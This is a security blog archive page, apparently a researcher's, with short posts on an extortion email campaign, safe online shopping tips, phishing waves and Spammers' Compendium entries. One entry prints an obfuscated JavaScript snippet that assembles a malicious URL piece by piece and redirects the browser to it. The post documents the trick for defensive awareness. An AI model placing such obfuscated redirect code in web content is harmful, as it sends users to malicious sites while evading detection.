website

“Your Site Has Been Hacked” ransomware email campaign in the wild

I was actually not expecting this kind of ransomware… I am used by now to “You’re hacked”, “You’re infected”… and others alike, but this one with the website is actually really interesting. What I find very disturbing is the fact that there are 5 transactions. A few were for tests, I think, but there is at least one who paid. They do use a correct website of mine. PS: Of course my site hasn’t been hacked :))

Here are some of the headers:

Return-Path: <hacker@autoservistoth.cz>
Received: from autoservistoth.cz ([213.157.59.58]) by mx.google.com with ESMTP id ce7si16117485edb.534.2020.04.17.03.08.14 for <sorin@mustaca.com>; Fri, 17 Apr 2020 03:08:23 -0700 (PDT)
Received-SPF: neutral (google.com: 213.157.59.58 is neither permitted nor denied by best guess record for domain of hacker@autoservistoth.cz) client-ip=213.157.59.58;
Authentication-Results: mx.google.com; spf=neutral (google.com: 213.157.59.58 is neither permitted nor denied by best guess record for domain of hacker@autoservistoth.cz) smtp.mailfrom=hacker@autoservistoth.cz
X-AntiVirus: Checked by Dr.Web [version: 11.1.11.04270, engine: 11.1.9.04170, virus records: 6152810, updated: 8.05.2017]
Return-path: <postmaster@thehomebase.top>
From: “Hacker” <hacker@autoservistoth.cz>
To: sorin@mustaca.com

For better indexing, this is the body of the email:

PLEASE FORWARD THIS EMAIL TO SOMEONE IN YOUR COMPANY WHO IS ALLOWED TO MAKE IMPORTANT DECISIONS! We have hacked your website http://www.xxxxxx.com and extracted…



Security tips for safe online shopping

During the holiday season many people receive packages from the post or delivery services. We wrote about the dangers introduced by opening attachments in emails pretending to come from such entities. Without active and up-to-date security software, attachments in email should never be opened, no matter where they come from. We also recommend that consumers watch for a few things in order not to become a victim of online fraudsters:

– If you connect to the Internet via WiFi, make sure it is encrypted.
– If you connect to the webshop via a mobile device like a tablet or smartphone, make sure that the website reacts correctly to touch. Not all websites allow easy usage via such interfaces. You don’t want to order 10 items instead of one, or press cancel instead of proceed after you searched for hours for the right product.
– If you don’t know the website you plan to buy from, always check its reputation. Search for other users who are commenting about that website. Searching for “<website> reputation” usually gives good and relevant results.
– Always check that the connection to the online store where the payment is done is secured….



Never forget that as soon as any information is published on a public website, it doesn’t actually belong to you anymore

Avira Survey Finds Computer Users Don’t Feel Safe on Social Media Sites

“This survey was very interesting because it demonstrated that even though social media sites are very popular among the general population, computer users from all over the world have the same concerns,” said Sorin Mustaca, data security expert at Avira. “They are wary of the safety of their personal information when it’s disseminated across social media sites. In order to use social media sites without being afraid of having your data misused, I strongly advise not storing private data on these websites. Never forget that as soon as any information is published on a public website, it doesn’t actually belong to you anymore,” he added.

Read more here:
http://www.sunherald.com/2012/05/02/3920520/avira-survey-finds-computer-users.html#storylink=cpy
http://www.msnbc.msn.com/id/47264062#.T6Ir8qu_G8A
http://www.marketwatch.com/story/avira-survey-finds-computer-users-dont-feel-safe-on-social-media-sites-2012-05-02
http://www.webpronews.com/84-of-facebook-google-users-feel-personal-info-isnt-safe-2012-05
http://eon.businesswire.com/news/eon/20120502005598/en/security/Avira/identity-theft



Some tips for Shopping Online safe

The source is an article I wrote for the Avira press release: http://www.avira.com/en/press-details/nid/528/news/consumers-concerns-online-shopping-safety

Here are the tips:

I recommend that consumers watch for a few things in order to not become a victim of the online fraudsters:

– Always check that the connection to the online store where the payment is done is secured. This can be observed first if the URL is starting with “https” and second if a small lock is present in the top left corner of the browser in the URL field (in Chrome) or the name of the website is written in a colored rectangle (in Firefox, IE). If the web browser gives any warnings about the security certificate of the website, then do not proceed to purchase anything from that website.
– If you don’t know the website you plan to buy from, always check its reputation first. Search for comments from other users about that website. Searching for “<website> reputation” usually gives good and relevant results.
– Give your financial details like credit card data only if the website is properly secured and its reputation is good.
– Try to choose payment methods which don’t require payment upfront. If PayPal is an option, choose that whenever possible….



New design for my personal website

I finally found some time to change the website from the old design in dark colors to a WordPress (static) blog. The new design is simpler and it is only on one single level. I got rid of all the old things and left only what is relevant. Here is the structure with links:

– Home – main page
– Management – will contain information about product management and project management
– About – some information about me
– Blog – link to this blog
– Pets – some pictures of my favorite pets
– Photography – random selection of my photos on Flickr
– Reading – random selection of the books I own (and have read) from mylibrarything.com
– Writing – selection and links to articles, interviews and other things I wrote
– Twitter – the content of my Twitter account



All browsers are (not) equal

I recently installed IE9 because it is the latest which Microsoft produced. I was curious what my website looks like, so I told myself that it wouldn’t be a bad idea to compare this website in various browsers. I took Google’s Chrome, Mozilla Firefox and IE9, the latest versions at the moment of writing this post. Here are the pictures of the right side of my site:

No comments… the pictures tell everything: Firefox is years ahead of Chrome and IE.

Firefox Chrome/Safari IE9



New entry in the TSC: Script in the middle

Thanks to Virus Bulletin, we now have a new entry in The Spammers’ Compendium: Script in the middle

UO!Script in the Middle!JavaScript
14 October 2010

Description
The email has an HTML document attached to it that contains a form. Clicking submit will POST the user’s data to a website controlled by the crooks, which automatically and invisibly redirects to a legitimate website. See also The Responsibility Transfer.

The original article with all the juicy details can be found in Avira Techblog: http://techblog.avira.com/2010/09/08/phishing-getting-verified/en/



QR Code of this website

QR Code of this website from bit.ly: (Taken from bit.ly by adding .qr at the end of the shortened URL)

Taken from goo.gl:

More about the QR codes can be found on Wikipedia: http://en.wikipedia.org/wiki/QR_Code

A QR Code is a matrix barcode (or two-dimensional code), readable by QR scanners, mobile phones with a camera, and smartphones. The code consists of black modules arranged in a square pattern on white background. The information encoded can be text, URL or other data.

Common in Japan, where it was created by Toyota subsidiary Denso-Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes. QR is the initialism of Quick Response, as the creator intended the code to allow its contents to be decoded at high speed.

Although initially used for tracking parts in vehicle manufacturing, QR Codes are now used in a much broader context, including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (known as mobile tagging). QR Codes storing addresses and URLs may appear in magazines, on signs, buses, business cards, or on just about any object about which users might need information. Users with a camera phone equipped with the correct…



New Spammer’s Compendium Entry: The Responsibility Transfer

Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml

The Responsibility Transfer
UO!Responsibility!JavaScript
31 August 2010

Description
Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin Mustaca.

Example

<script>function r(){};fQ=false;d="";r.prototype = {p : function() {
this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;
document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");
this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";
var gK=false;var zA=new r();
pU='';this.u="u";zA.p();var lK=false;
</script>



Facebook and Twitter Phishing (on first sight)

The source of the articles is in the Avira Techblog:
Twitter Phishing (on first sight)
Facebook Phishing (on first sight)

Twitter

Over the weekend our spam traps received a massive wave of emails looking like the one below:

The emails seem to stem from “Twitter Support” (support@twitter.com) and are addressed each to exactly one unique email address. The link in the email seems to be unique for each email sent, too. Quite an effort to make the email look more legitimate. The target link is always a compromised website holding an html page.

After clicking on the URL, a multiple stage redirection takes place. On some of these redirection websites, the intermediate page raises alerts because our engine detects encrypted content in JS.

Finally comes the surprise: The target website at the end of the redirects is not a phishing website but a Canadian online pharmacy. For me personally this was a “Wow!” moment. Why did the spammers choose to send the emails as Twitter phishing? I think that the explanation is simple – they did it because nobody did it before.

As usual, users of the Avira Premium Security Suite and the users of…

